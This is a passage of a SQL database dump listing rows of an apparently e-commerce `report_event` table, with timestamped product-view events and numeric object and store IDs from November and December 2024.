(14590, '2024-11-07 19:17:03', 1, 2063, 0, 1, 1),
(14591, '2024-11-07 19:44:26', 1, 2058, 0, 1, 1),
(14592, '2024-11-07 20:38:09', 1, 2055, 0, 1, 1),
(14593, '2024-11-07 22:06:54', 1, 2061, 0, 1, 1),
(14594, '2024-11-07 22:42:37', 1, 2062, 0, 1, 1),
(14595, '2024-11-07 23:46:46', 1, 2054, 0, 1, 1),
(14596, '2024-11-08 00:00:32', 1, 2059, 0, 1, 1),
(14597, '2024-11-08 00:10:17', 1, 2064, 0, 1, 1),
(14598, '2024-11-08 00:50:08', 1, 2060, 0, 1, 1),
(14599, '2024-11-08 00:57:56', 1, 2063, 0, 1, 1),
(14600, '2024-11-08 01:23:43', 1, 2058, 0, 1, 1),
(14601, '2024-11-08 02:18:34', 1, 2055, 0, 1, 1),
(14602, '2024-11-08 03:47:52', 1, 2061, 0, 1, 1),
(14603, '2024-11-08 04:18:54', 1, 2058, 0, 1, 1),
(14604, '2024-11-08 04:25:19', 1, 2062, 0, 1, 1),
(14605, '2024-11-08 05:30:10', 1, 2054, 0, 1, 1),
(14606, '2024-11-08 05:42:55', 1, 2059, 0, 1, 1),
(14607, '2024-11-08 05:52:47', 1, 2064, 0, 1, 1),
(14608, '2024-11-08 06:34:51', 1, 2054, 0, 1, 1),
(14609, '2024-11-08 08:17:44', 1, 2059, 0, 1, 1),
(14610, '2024-11-08 08:39:27', 1, 2054, 0, 1, 1),
(14611, '2024-11-08 10:28:55', 1, 2061, 0, 1, 1),
(14612, '2024-11-08 10:30:52', 1, 2064, 0, 1, 1),
(14613, '2024-11-08 12:53:37', 1, 2064, 0, 1, 1),
(14614, '2024-11-08 15:06:46', 1, 2061, 0, 1, 1),
(14615, '2024-11-08 15:09:16', 1, 2064, 0, 1, 1),
(14616, '2024-11-08 22:24:27', 1, 2060, 0, 1, 1),
(14617, '2024-11-08 22:40:57', 1, 2063, 0, 1, 1),
(14618, '2024-11-08 23:28:18', 1, 2058, 0, 1, 1),
(14619, '2024-11-09 01:01:57', 1, 2055, 0, 1, 1),
(14620, '2024-11-09 01:34:49', 1, 2061, 0, 1, 1),
(14621, '2024-11-09 01:37:28', 1, 2060, 0, 1, 1),
(14622, '2024-11-09 01:46:36', 1, 2063, 0, 1, 1),
(14623, '2024-11-09 02:12:24', 1, 2058, 0, 1, 1),
(14624, '2024-11-09 03:05:24', 1, 2055, 0, 1, 1),
(14625, '2024-11-09 03:41:40', 1, 2060, 0, 1, 1),
(14626, '2024-11-09 03:51:18', 1, 2063, 0, 1, 1),
(14627, '2024-11-09 04:22:30', 1, 2058, 0, 1, 1),
(14628, '2024-11-09 05:20:39', 1, 2055, 0, 1, 1),
(14629, '2024-11-09 06:55:36', 1, 2061, 0, 1, 1),
(14630, '2024-11-09 07:36:24', 1, 2062, 0, 1, 1),
(14631, '2024-11-09 09:02:39', 1, 2060, 0, 1, 1),
(14632, '2024-11-09 09:10:57', 1, 2063, 0, 1, 1),
(14633, '2024-11-09 09:35:33', 1, 2058, 0, 1, 1),
(14634, '2024-11-09 10:24:44', 1, 2055, 0, 1, 1),
(14635, '2024-11-09 11:45:37', 1, 2061, 0, 1, 1),
(14636, '2024-11-09 12:19:09', 1, 2062, 0, 1, 1),
(14637, '2024-11-09 13:16:02', 1, 2054, 0, 1, 1),
(14638, '2024-11-09 13:26:57', 1, 2059, 0, 1, 1),
(14639, '2024-11-09 13:36:02', 1, 2064, 0, 1, 1),
(14640, '2024-11-09 22:03:54', 1, 2064, 0, 1, 1),
(14641, '2024-11-10 05:03:36', 1, 2054, 0, 1, 1),
(14642, '2024-11-10 16:51:11', 1, 2064, 0, 1, 1),
(14643, '2024-11-10 18:09:32', 1, 2059, 0, 1, 1),
(14644, '2024-11-10 21:47:02', 1, 2062, 0, 1, 1),
(14645, '2024-11-10 21:47:05', 1, 2058, 0, 1, 1),
(14646, '2024-11-10 21:47:10', 1, 2064, 0, 1, 1),
(14647, '2024-11-10 23:39:41', 1, 2060, 0, 1, 1),
(14648, '2024-11-11 02:36:25', 1, 2064, 0, 1, 1),
(14649, '2024-11-11 03:13:43', 1, 2054, 0, 1, 1),
(14650, '2024-11-11 03:42:12', 1, 2064, 0, 1, 1),
(14651, '2024-11-11 04:07:10', 1, 2062, 0, 1, 1),
(14652, '2024-11-11 05:27:37', 1, 2060, 0, 1, 1),
(14653, '2024-11-11 08:59:09', 1, 2059, 0, 1, 1),
(14654, '2024-11-11 15:40:16', 1, 2060, 0, 1, 1),
(14655, '2024-11-11 16:42:39', 1, 2060, 0, 1, 1),
(14656, '2024-11-11 16:46:10', 1, 2064, 0, 1, 1),
(14657, '2024-11-11 21:05:57', 1, 2054, 0, 1, 1),
(14658, '2024-11-12 08:36:34', 1, 2061, 0, 1, 1),
(14659, '2024-11-12 10:18:39', 1, 2054, 0, 1, 1),
(14660, '2024-11-12 15:19:30', 1, 2064, 0, 1, 1),
(14661, '2024-11-12 16:44:14', 1, 2061, 0, 1, 1),
(14662, '2024-11-12 20:23:04', 1, 2062, 0, 1, 1),
(14663, '2024-11-13 00:06:52', 1, 2058, 0, 1, 1),
(14664, '2024-11-13 00:23:58', 1, 2054, 0, 1, 1),
(14665, '2024-11-13 01:56:27', 1, 2063, 0, 1, 1),
(14666, '2024-11-13 01:57:28', 1, 2059, 0, 1, 1),
(14667, '2024-11-13 02:00:58', 1, 2061, 0, 1, 1),
(14668, '2024-11-13 02:37:33', 1, 2055, 0, 1, 1),
(14669, '2024-11-13 06:19:04', 1, 2064, 0, 1, 1),
(14670, '2024-11-13 12:16:05', 1, 2054, 0, 1, 1),
(14671, '2024-11-13 14:17:38', 1, 2063, 0, 1, 1),
(14672, '2024-11-13 14:47:48', 1, 2063, 0, 1, 1),
(14673, '2024-11-13 14:52:11', 1, 2062, 0, 1, 1),
(14674, '2024-11-13 14:54:51', 1, 2058, 0, 1, 1),
(14675, '2024-11-13 16:21:54', 1, 2064, 0, 1, 1),
(14676, '2024-11-13 16:22:08', 1, 2062, 2777, 1, 1),
(14677, '2024-11-13 16:22:10', 1, 2055, 2777, 1, 1),
(14678, '2024-11-13 16:22:12', 1, 2064, 2777, 1, 1),
(14679, '2024-11-13 16:22:15', 1, 2058, 2777, 1, 1),
(14680, '2024-11-13 16:22:21', 1, 2059, 2777, 1, 1),
(14681, '2024-11-13 16:22:25', 1, 2062, 2777, 1, 1),
(14682, '2024-11-13 16:22:32', 1, 2059, 2777, 1, 1),
(14683, '2024-11-13 16:22:36', 1, 2064, 2777, 1, 1),
(14684, '2024-11-13 16:22:41', 1, 2054, 2777, 1, 1),
(14685, '2024-11-13 16:22:43', 1, 2060, 2777, 1, 1),
(14686, '2024-11-13 16:22:47', 1, 2061, 2777, 1, 1),
(14687, '2024-11-13 22:25:27', 1, 2063, 0, 1, 1),
(14688, '2024-11-13 22:53:42', 1, 2054, 0, 1, 1),
(14689, '2024-11-14 00:20:55', 1, 2064, 0, 1, 1),
(14690, '2024-11-14 02:13:18', 1, 2053, 0, 1, 1),
(14691, '2024-11-14 07:03:27', 1, 2063, 0, 1, 1),
(14692, '2024-11-14 08:23:26', 1, 2058, 0, 1, 1),
(14693, '2024-11-14 09:57:00', 1, 2060, 0, 1, 1),
(14694, '2024-11-14 10:43:01', 1, 2063, 0, 1, 1),
(14695, '2024-11-14 12:02:36', 1, 2054, 0, 1, 1),
(14696, '2024-11-14 12:02:39', 1, 2055, 0, 1, 1),
(14697, '2024-11-14 12:02:40', 1, 2062, 0, 1, 1),
(14698, '2024-11-14 12:02:42', 1, 2059, 0, 1, 1),
(14699, '2024-11-14 12:02:43', 1, 2064, 0, 1, 1),
(14700, '2024-11-14 12:02:45', 1, 2063, 0, 1, 1),
(14701, '2024-11-14 12:02:45', 1, 2061, 0, 1, 1),
(14702, '2024-11-14 12:02:47', 1, 2060, 0, 1, 1),
(14703, '2024-11-14 12:02:51', 1, 2058, 0, 1, 1),
(14704, '2024-11-14 13:05:59', 1, 2054, 0, 1, 1),
(14705, '2024-11-14 13:28:13', 1, 2054, 0, 1, 1),
(14706, '2024-11-14 17:28:40', 1, 2054, 0, 1, 1),
(14707, '2024-11-15 02:27:00', 1, 2062, 0, 1, 1),
(14708, '2024-11-15 03:59:25', 1, 2063, 0, 1, 1),
(14709, '2024-11-15 04:00:15', 1, 2059, 0, 1, 1),
(14710, '2024-11-15 04:01:02', 1, 2061, 0, 1, 1),
(14711, '2024-11-15 04:04:24', 1, 2058, 0, 1, 1),
(14712, '2024-11-15 04:04:28', 1, 2062, 0, 1, 1),
(14713, '2024-11-15 08:56:54', 1, 2058, 0, 1, 1),
(14714, '2024-11-15 08:57:10', 1, 2064, 0, 1, 1),
(14715, '2024-11-15 08:57:28', 1, 2062, 0, 1, 1),
(14716, '2024-11-15 08:57:34', 1, 2055, 0, 1, 1),
(14717, '2024-11-15 08:57:40', 1, 2054, 0, 1, 1),
(14718, '2024-11-15 08:58:02', 1, 2059, 0, 1, 1),
(14719, '2024-11-15 08:58:05', 1, 2063, 0, 1, 1),
(14720, '2024-11-15 08:58:09', 1, 2061, 0, 1, 1),
(14721, '2024-11-15 08:58:17', 1, 2060, 0, 1, 1),
(14722, '2024-11-15 08:58:39', 1, 2058, 0, 1, 1),
(14723, '2024-11-15 08:58:50', 1, 2064, 0, 1, 1),
(14724, '2024-11-15 08:59:09', 1, 2062, 0, 1, 1);
INSERT INTO `report_event` (`event_id`, `logged_at`, `event_type_id`, `object_id`, `subject_id`, `subtype`, `store_id`) VALUES
(14725, '2024-11-15 08:59:12', 1, 2055, 0, 1, 1),
(14726, '2024-11-15 08:59:22', 1, 2059, 0, 1, 1),
(14727, '2024-11-15 08:59:27', 1, 2063, 0, 1, 1),
(14728, '2024-11-15 08:59:31', 1, 2061, 0, 1, 1),
(14729, '2024-11-15 08:59:34', 1, 2054, 0, 1, 1),
(14730, '2024-11-15 08:59:40', 1, 2060, 0, 1, 1),
(14731, '2024-11-15 09:00:05', 1, 2053, 0, 1, 1),
(14732, '2024-11-15 09:08:59', 1, 2061, 0, 1, 1),
(14733, '2024-11-15 09:17:13', 1, 2054, 0, 1, 1),
(14734, '2024-11-15 10:17:17', 1, 2061, 0, 1, 1),
(14735, '2024-11-15 13:50:41', 1, 2064, 0, 1, 1),
(14736, '2024-11-15 14:22:55', 1, 2063, 0, 1, 1),
(14737, '2024-11-15 17:58:38', 1, 2061, 0, 1, 1),
(14738, '2024-11-15 22:56:16', 1, 2064, 0, 1, 1),
(14739, '2024-11-16 02:27:01', 1, 2062, 0, 1, 1),
(14740, '2024-11-16 11:10:33', 1, 2064, 0, 1, 1),
(14741, '2024-11-16 14:57:06', 1, 2054, 0, 1, 1),
(14742, '2024-11-16 21:13:14', 1, 2055, 0, 1, 1),
(14743, '2024-11-16 21:42:22', 1, 2064, 0, 1, 1),
(14744, '2024-11-16 23:12:26', 1, 2058, 0, 1, 1),
(14745, '2024-11-17 06:36:42', 1, 2054, 0, 1, 1),
(14746, '2024-11-17 10:28:02', 1, 2059, 0, 1, 1),
(14747, '2024-11-17 12:42:41', 1, 2059, 0, 1, 1),
(14748, '2024-11-17 13:21:24', 1, 2063, 0, 1, 1),
(14749, '2024-11-17 13:31:47', 1, 2061, 0, 1, 1),
(14750, '2024-11-17 13:47:17', 1, 2058, 0, 1, 1),
(14751, '2024-11-17 13:58:48', 1, 2062, 0, 1, 1),
(14752, '2024-11-17 14:38:02', 1, 2061, 0, 1, 1),
(14753, '2024-11-17 16:21:28', 1, 2058, 0, 1, 1),
(14754, '2024-11-17 16:30:28', 1, 2062, 0, 1, 1),
(14755, '2024-11-17 16:35:58', 1, 2064, 0, 1, 1),
(14756, '2024-11-17 16:43:38', 1, 2054, 0, 1, 1),
(14757, '2024-11-17 18:29:39', 1, 2059, 0, 1, 1),
(14758, '2024-11-17 20:30:21', 1, 2061, 0, 1, 1),
(14759, '2024-11-17 22:44:34', 1, 2061, 0, 1, 1),
(14760, '2024-11-18 01:02:47', 1, 2062, 0, 1, 1),
(14761, '2024-11-18 02:31:18', 1, 2059, 0, 1, 1),
(14762, '2024-11-18 04:32:11', 1, 2064, 0, 1, 1),
(14763, '2024-11-18 05:59:35', 1, 2061, 0, 1, 1),
(14764, '2024-11-18 06:28:32', 1, 2059, 0, 1, 1),
(14765, '2024-11-18 06:30:20', 1, 2062, 0, 1, 1),
(14766, '2024-11-18 14:07:46', 1, 2059, 0, 1, 1),
(14767, '2024-11-18 14:45:32', 1, 2061, 0, 1, 1),
(14768, '2024-11-18 15:08:36', 1, 2064, 0, 1, 1),
(14769, '2024-11-18 17:28:56', 1, 2060, 0, 1, 1),
(14770, '2024-11-18 18:21:08', 1, 2054, 0, 1, 1),
(14771, '2024-11-19 09:30:25', 1, 2054, 0, 1, 1),
(14772, '2024-11-19 10:13:44', 1, 2059, 0, 1, 1),
(14773, '2024-11-20 01:07:51', 1, 2064, 0, 1, 1),
(14774, '2024-11-20 06:21:12', 1, 2053, 0, 1, 1),
(14775, '2024-11-20 09:46:15', 1, 2054, 0, 1, 1),
(14776, '2024-11-20 12:30:19', 1, 2054, 0, 1, 1),
(14777, '2024-11-20 13:14:35', 1, 2058, 0, 1, 1),
(14778, '2024-11-21 00:17:39', 1, 2058, 0, 1, 1),
(14779, '2024-11-21 02:06:35', 1, 2063, 0, 1, 1),
(14780, '2024-11-21 07:25:51', 1, 2060, 0, 1, 1),
(14781, '2024-11-21 07:41:36', 1, 2063, 0, 1, 1),
(14782, '2024-11-21 08:24:16', 1, 2058, 0, 1, 1),
(14783, '2024-11-21 10:01:16', 1, 2055, 0, 1, 1),
(14784, '2024-11-21 12:48:23', 1, 2061, 0, 1, 1),
(14785, '2024-11-21 13:58:46', 1, 2062, 0, 1, 1),
(14786, '2024-11-21 16:01:46', 1, 2054, 0, 1, 1),
(14787, '2024-11-21 16:27:28', 1, 2059, 0, 1, 1),
(14788, '2024-11-21 16:49:32', 1, 2064, 0, 1, 1),
(14789, '2024-11-21 19:21:56', 1, 2064, 0, 1, 1),
(14790, '2024-11-21 23:11:31', 1, 2064, 0, 1, 1),
(14791, '2024-11-22 02:16:07', 1, 2062, 0, 1, 1),
(14792, '2024-11-22 07:16:19', 1, 2063, 0, 1, 1),
(14793, '2024-11-22 07:24:07', 1, 2063, 0, 1, 1),
(14794, '2024-11-22 07:42:34', 1, 2054, 0, 1, 1),
(14795, '2024-11-22 08:02:43', 1, 2055, 0, 1, 1),
(14796, '2024-11-22 09:44:18', 1, 2062, 0, 1, 1),
(14797, '2024-11-22 11:09:59', 1, 2058, 0, 1, 1),
(14798, '2024-11-22 11:15:35', 1, 2054, 0, 1, 1),
(14799, '2024-11-22 14:42:23', 1, 2059, 0, 1, 1),
(14800, '2024-11-22 14:43:58', 1, 2063, 0, 1, 1),
(14801, '2024-11-22 14:46:50', 1, 2054, 0, 1, 1),
(14802, '2024-11-22 14:48:42', 1, 2062, 0, 1, 1),
(14803, '2024-11-22 14:51:35', 1, 2061, 0, 1, 1),
(14804, '2024-11-22 14:53:17', 1, 2058, 0, 1, 1),
(14805, '2024-11-22 15:05:16', 1, 2055, 0, 1, 1),
(14806, '2024-11-22 15:22:56', 1, 2064, 0, 1, 1),
(14807, '2024-11-22 15:23:46', 1, 2060, 0, 1, 1),
(14808, '2024-11-22 21:23:23', 1, 2063, 0, 1, 1),
(14809, '2024-11-22 22:44:46', 1, 2061, 0, 1, 1),
(14810, '2024-11-22 22:44:47', 1, 2061, 0, 1, 1),
(14811, '2024-11-22 23:08:30', 1, 2054, 0, 1, 1),
(14812, '2024-11-23 03:05:28', 1, 2054, 0, 1, 1),
(14813, '2024-11-23 03:36:56', 1, 2063, 0, 1, 1),
(14814, '2024-11-23 03:52:09', 1, 2055, 0, 1, 1),
(14815, '2024-11-23 04:35:19', 1, 2062, 0, 1, 1),
(14816, '2024-11-23 06:00:44', 1, 2062, 0, 1, 1),
(14817, '2024-11-23 07:00:23', 1, 2060, 0, 1, 1),
(14818, '2024-11-23 09:08:10', 1, 2054, 0, 1, 1),
(14819, '2024-11-23 09:34:33', 1, 2062, 0, 1, 1),
(14820, '2024-11-23 13:45:30', 1, 2060, 0, 1, 1),
(14821, '2024-11-23 19:21:30', 1, 2058, 0, 1, 1),
(14822, '2024-11-23 19:39:37', 1, 2058, 0, 1, 1),
(14823, '2024-11-23 20:41:50', 1, 2059, 0, 1, 1),
(14824, '2024-11-23 21:05:42', 1, 2059, 0, 1, 1),
(14825, '2024-11-23 21:34:06', 1, 2055, 0, 1, 1),
(14826, '2024-11-23 23:06:01', 1, 2062, 0, 1, 1),
(14827, '2024-11-23 23:10:27', 1, 2061, 0, 1, 1),
(14828, '2024-11-23 23:14:27', 1, 2063, 0, 1, 1),
(14829, '2024-11-23 23:45:31', 1, 2064, 0, 1, 1),
(14830, '2024-11-24 03:07:40', 1, 2061, 0, 1, 1),
(14831, '2024-11-24 03:24:59', 1, 2053, 0, 1, 1),
(14832, '2024-11-24 03:57:05', 1, 2064, 0, 1, 1),
(14833, '2024-11-24 13:05:36', 1, 2059, 0, 1, 1),
(14834, '2024-11-24 15:44:49', 1, 2064, 0, 1, 1),
(14835, '2024-11-24 16:01:35', 1, 2058, 0, 1, 1),
(14836, '2024-11-24 19:31:43', 1, 2062, 0, 1, 1),
(14837, '2024-11-24 21:59:40', 1, 2059, 0, 1, 1),
(14838, '2024-11-24 23:17:40', 1, 2054, 0, 1, 1),
(14839, '2024-11-25 01:01:46', 1, 2055, 0, 1, 1),
(14840, '2024-11-25 01:33:40', 1, 2054, 0, 1, 1),
(14841, '2024-11-25 08:47:27', 1, 2053, 0, 1, 1),
(14842, '2024-11-25 09:32:48', 1, 2064, 0, 1, 1),
(14843, '2024-11-25 10:19:46', 1, 2063, 0, 1, 1),
(14844, '2024-11-25 11:00:56', 1, 2061, 0, 1, 1),
(14845, '2024-11-25 20:25:10', 1, 2055, 0, 1, 1),
(14846, '2024-11-26 01:05:11', 1, 2058, 0, 1, 1),
(14847, '2024-11-26 05:25:08', 1, 2054, 0, 1, 1),
(14848, '2024-11-26 06:10:04', 1, 2062, 0, 1, 1),
(14849, '2024-11-26 17:50:35', 1, 2054, 0, 1, 1),
(14850, '2024-11-26 18:04:25', 1, 2055, 0, 1, 1),
(14851, '2024-11-26 23:37:50', 1, 2062, 0, 1, 1),
(14852, '2024-11-27 00:49:13', 1, 2054, 0, 1, 1),
(14853, '2024-11-27 18:42:02', 1, 2054, 0, 1, 1),
(14854, '2024-11-27 23:59:39', 1, 2055, 0, 1, 1),
(14855, '2024-11-28 02:56:18', 1, 2053, 0, 1, 1),
(14856, '2024-11-28 07:12:28', 1, 2059, 0, 1, 1),
(14857, '2024-11-28 12:22:29', 1, 2059, 0, 1, 1),
(14858, '2024-11-28 14:30:59', 1, 2053, 0, 1, 1),
(14859, '2024-11-28 14:51:25', 1, 2059, 0, 1, 1),
(14860, '2024-11-28 18:04:56', 1, 2061, 0, 1, 1),
(14861, '2024-11-28 18:07:22', 1, 2060, 0, 1, 1),
(14862, '2024-11-28 18:07:42', 1, 2064, 0, 1, 1),
(14863, '2024-11-28 21:32:28', 1, 2064, 0, 1, 1),
(14864, '2024-11-28 23:47:55', 1, 2061, 0, 1, 1),
(14865, '2024-11-29 00:24:59', 1, 2062, 0, 1, 1),
(14866, '2024-11-29 01:45:01', 1, 2053, 0, 1, 1),
(14867, '2024-11-29 02:18:00', 1, 2063, 0, 1, 1),
(14868, '2024-11-29 05:25:06', 1, 2064, 0, 1, 1),
(14869, '2024-11-29 11:40:07', 1, 2060, 0, 1, 1),
(14870, '2024-11-29 17:58:24', 1, 2064, 0, 1, 1),
(14871, '2024-11-29 20:53:24', 1, 2064, 0, 1, 1),
(14872, '2024-11-29 21:46:39', 1, 2054, 0, 1, 1),
(14873, '2024-11-30 02:54:42', 1, 2060, 0, 1, 1),
(14874, '2024-11-30 02:54:45', 1, 2063, 0, 1, 1),
(14875, '2024-11-30 02:54:48', 1, 2058, 0, 1, 1),
(14876, '2024-11-30 02:54:52', 1, 2055, 0, 1, 1),
(14877, '2024-11-30 02:54:58', 1, 2061, 0, 1, 1),
(14878, '2024-11-30 02:55:03', 1, 2062, 0, 1, 1),
(14879, '2024-11-30 02:57:51', 1, 2054, 0, 1, 1),
(14880, '2024-11-30 02:58:31', 1, 2059, 0, 1, 1),
(14881, '2024-11-30 02:58:58', 1, 2064, 0, 1, 1),
(14882, '2024-11-30 05:56:18', 1, 2060, 0, 1, 1),
(14883, '2024-11-30 05:56:22', 1, 2063, 0, 1, 1),
(14884, '2024-11-30 05:56:24', 1, 2058, 0, 1, 1),
(14885, '2024-11-30 05:56:27', 1, 2055, 0, 1, 1),
(14886, '2024-11-30 05:56:34', 1, 2061, 0, 1, 1),
(14887, '2024-11-30 05:56:38', 1, 2062, 0, 1, 1),
(14888, '2024-11-30 05:58:50', 1, 2054, 0, 1, 1),
(14889, '2024-11-30 05:59:26', 1, 2059, 0, 1, 1),
(14890, '2024-11-30 05:59:56', 1, 2064, 0, 1, 1),
(14891, '2024-11-30 12:23:05', 1, 2059, 0, 1, 1),
(14892, '2024-11-30 17:22:47', 1, 2054, 0, 1, 1),
(14893, '2024-11-30 20:16:46', 1, 2062, 0, 1, 1),
(14894, '2024-11-30 21:32:32', 1, 2058, 0, 1, 1),
(14895, '2024-11-30 22:31:30', 1, 2061, 0, 1, 1),
(14896, '2024-12-01 02:06:40', 1, 2054, 0, 1, 1),
(14897, '2024-12-01 06:25:26', 1, 2062, 0, 1, 1),
(14898, '2024-12-01 08:08:09', 1, 2063, 0, 1, 1),
(14899, '2024-12-01 13:55:53', 1, 2063, 0, 1, 1),
(14900, '2024-12-01 20:30:14', 1, 2062, 0, 1, 1),
(14901, '2024-12-02 03:02:03', 1, 2063, 0, 1, 1),
(14902, '2024-12-02 03:02:13', 1, 2062, 0, 1, 1),
(14903, '2024-12-02 03:02:24', 1, 2060, 0, 1, 1),
(14904, '2024-12-02 03:02:40', 1, 2059, 0, 1, 1),
(14905, '2024-12-02 05:41:13', 1, 2053, 0, 1, 1),
(14906, '2024-12-02 12:57:47', 1, 2059, 0, 1, 1),
(14907, '2024-12-02 13:03:11', 1, 2059, 0, 1, 1),
(14908, '2024-12-02 17:01:18', 1, 2062, 0, 1, 1),
(14909, '2024-12-02 19:34:21', 1, 2061, 0, 1, 1),
(14910, '2024-12-02 20:57:36', 1, 2061, 0, 1, 1),
(14911, '2024-12-02 21:06:52', 1, 2058, 0, 1, 1),
(14912, '2024-12-02 22:06:14', 1, 2061, 0, 1, 1),
(14913, '2024-12-02 22:08:01', 1, 2064, 0, 1, 1),
(14914, '2024-12-02 23:13:02', 1, 2062, 0, 1, 1),
(14915, '2024-12-03 04:37:27', 1, 2054, 0, 1, 1),
(14916, '2024-12-03 04:54:29', 1, 2061, 0, 1, 1),
(14917, '2024-12-03 06:30:32', 1, 2060, 0, 1, 1),
(14918, '2024-12-03 07:22:23', 1, 2054, 0, 1, 1),
(14919, '2024-12-03 20:14:30', 1, 2054, 0, 1, 1),
(14920, '2024-12-04 05:05:15', 1, 2059, 0, 1, 1),
(14921, '2024-12-04 05:05:17', 1, 2059, 0, 1, 1),
(14922, '2024-12-04 07:39:05', 1, 2059, 0, 1, 1),
(14923, '2024-12-04 09:29:25', 1, 2059, 0, 1, 1),
(14924, '2024-12-04 11:40:58', 1, 2059, 0, 1, 1),
(14925, '2024-12-04 18:11:35', 1, 2060, 0, 1, 1),
(14926, '2024-12-04 18:55:12', 1, 2059, 0, 1, 1),
(14927, '2024-12-04 19:06:08', 1, 2064, 0, 1, 1),
(14928, '2024-12-04 22:35:39', 1, 2058, 0, 1, 1),
(14929, '2024-12-05 05:02:55', 1, 2058, 0, 1, 1),
(14930, '2024-12-05 05:02:55', 1, 2055, 0, 1, 1),
(14931, '2024-12-05 05:02:55', 1, 2064, 0, 1, 1),
(14932, '2024-12-05 05:02:55', 1, 2064, 0, 1, 1),
(14933, '2024-12-05 05:02:55', 1, 2064, 0, 1, 1),
(14934, '2024-12-05 05:02:55', 1, 2053, 0, 1, 1),
(14935, '2024-12-05 05:03:14', 1, 2061, 0, 1, 1),
(14936, '2024-12-05 05:03:32', 1, 2059, 0, 1, 1),
(14937, '2024-12-05 05:03:34', 1, 2054, 0, 1, 1),
(14938, '2024-12-05 05:03:35', 1, 2060, 0, 1, 1),
(14939, '2024-12-05 05:03:36', 1, 2053, 0, 1, 1),
(14940, '2024-12-05 05:03:37', 1, 2062, 0, 1, 1),
(14941, '2024-12-05 05:03:38', 1, 2063, 0, 1, 1),
(14942, '2024-12-05 06:24:34', 1, 2064, 0, 1, 1),
(14943, '2024-12-05 06:25:07', 1, 2061, 0, 1, 1),
(14944, '2024-12-05 06:25:22', 1, 2055, 0, 1, 1),
(14945, '2024-12-05 06:27:55', 1, 2062, 0, 1, 1),
(14946, '2024-12-05 06:28:09', 1, 2059, 0, 1, 1),
(14947, '2024-12-05 06:29:38', 1, 2054, 0, 1, 1),
(14948, '2024-12-05 06:33:39', 1, 2055, 0, 1, 1),
(14949, '2024-12-05 06:36:38', 1, 2061, 0, 1, 1),
(14950, '2024-12-05 06:38:01', 1, 2054, 0, 1, 1),
(14951, '2024-12-05 06:47:17', 1, 2058, 0, 1, 1),
(14952, '2024-12-05 07:46:51', 1, 2060, 0, 1, 1),
(14953, '2024-12-05 07:59:38', 1, 2055, 0, 1, 1),
(14954, '2024-12-05 07:59:39', 1, 2064, 0, 1, 1),
(14955, '2024-12-05 07:59:40', 1, 2064, 0, 1, 1),
(14956, '2024-12-05 07:59:42', 1, 2058, 0, 1, 1),
(14957, '2024-12-05 07:59:43', 1, 2064, 0, 1, 1),
(14958, '2024-12-05 07:59:43', 1, 2053, 0, 1, 1),
(14959, '2024-12-05 07:59:56', 1, 2061, 0, 1, 1),
(14960, '2024-12-05 08:00:52', 1, 2060, 0, 1, 1),
(14961, '2024-12-05 08:00:53', 1, 2054, 0, 1, 1),
(14962, '2024-12-05 08:00:54', 1, 2059, 0, 1, 1),
(14963, '2024-12-05 08:00:55', 1, 2062, 0, 1, 1),
(14964, '2024-12-05 08:00:56', 1, 2053, 0, 1, 1),
(14965, '2024-12-05 08:00:58', 1, 2063, 0, 1, 1),
(14966, '2024-12-05 08:17:41', 1, 2062, 0, 1, 1),
(14967, '2024-12-05 08:22:09', 1, 2058, 0, 1, 1),
(14968, '2024-12-05 08:39:32', 1, 2058, 0, 1, 1),
(14969, '2024-12-05 08:54:59', 1, 2060, 0, 1, 1),
(14970, '2024-12-05 09:14:54', 1, 2053, 0, 1, 1),
(14971, '2024-12-05 09:47:22', 1, 2064, 0, 1, 1),
(14972, '2024-12-05 11:54:50', 1, 2058, 0, 1, 1),
(14973, '2024-12-05 14:03:52', 1, 2059, 0, 1, 1),
(14974, '2024-12-05 18:09:44', 1, 2054, 0, 1, 1),
(14975, '2024-12-05 19:55:59', 1, 2064, 0, 1, 1),
(14976, '2024-12-05 22:19:18', 1, 2054, 0, 1, 1),
(14977, '2024-12-05 23:06:54', 1, 2058, 0, 1, 1),
(14978, '2024-12-06 02:14:08', 1, 2059, 0, 1, 1),
(14979, '2024-12-06 06:04:17', 1, 2054, 0, 1, 1),
(14980, '2024-12-06 11:45:12', 1, 2054, 0, 1, 1),
(14981, '2024-12-06 11:45:15', 1, 2055, 0, 1, 1),
(14982, '2024-12-06 11:45:22', 1, 2058, 0, 1, 1),
(14983, '2024-12-06 11:45:25', 1, 2061, 0, 1, 1),
(14984, '2024-12-06 11:45:29', 1, 2060, 0, 1, 1),
(14985, '2024-12-06 11:45:32', 1, 2059, 0, 1, 1),
(14986, '2024-12-06 11:45:35', 1, 2063, 0, 1, 1),
(14987, '2024-12-06 11:45:45', 1, 2062, 0, 1, 1),
(14988, '2024-12-06 11:45:48', 1, 2064, 0, 1, 1),
(14989, '2024-12-06 11:46:54', 1, 2053, 0, 1, 1),
(14990, '2024-12-06 19:54:21', 1, 2060, 0, 1, 1),
(14991, '2024-12-06 20:02:46', 1, 2063, 0, 1, 1),
(14992, '2024-12-06 20:06:25', 1, 2064, 0, 1, 1),
(14993, '2024-12-06 20:44:20', 1, 2060, 0, 1, 1),
(14994, '2024-12-06 20:52:08', 1, 2063, 0, 1, 1),
(14995, '2024-12-06 21:11:18', 1, 2058, 0, 1, 1),
(14996, '2024-12-06 21:49:13', 1, 2055, 0, 1, 1),
(14997, '2024-12-06 22:12:21', 1, 2060, 0, 1, 1),
(14998, '2024-12-06 22:20:11', 1, 2063, 0, 1, 1),
(14999, '2024-12-06 22:39:48', 1, 2058, 0, 1, 1),
(15000, '2024-12-06 23:16:24', 1, 2055, 0, 1, 1),
(15001, '2024-12-07 00:26:21', 1, 2061, 0, 1, 1),
(15002, '2024-12-07 01:05:46', 1, 2062, 0, 1, 1),
(15003, '2024-12-07 02:13:54', 1, 2054, 0, 1, 1),
(15004, '2024-12-07 02:27:59', 1, 2059, 0, 1, 1),
(15005, '2024-12-07 02:40:35', 1, 2064, 0, 1, 1),
(15006, '2024-12-07 06:50:48', 1, 2060, 0, 1, 1),
(15007, '2024-12-07 06:59:00', 1, 2063, 0, 1, 1),
(15008, '2024-12-07 07:03:04', 1, 2054, 0, 1, 1),
(15009, '2024-12-07 07:19:01', 1, 2058, 0, 1, 1),
(15010, '2024-12-07 07:56:51', 1, 2055, 0, 1, 1),
(15011, '2024-12-07 09:06:36', 1, 2061, 0, 1, 1),
(15012, '2024-12-07 09:38:43', 1, 2055, 0, 1, 1),
(15013, '2024-12-07 09:38:45', 1, 2058, 0, 1, 1),
(15014, '2024-12-07 09:45:15', 1, 2062, 0, 1, 1),
(15015, '2024-12-07 10:51:44', 1, 2054, 0, 1, 1),
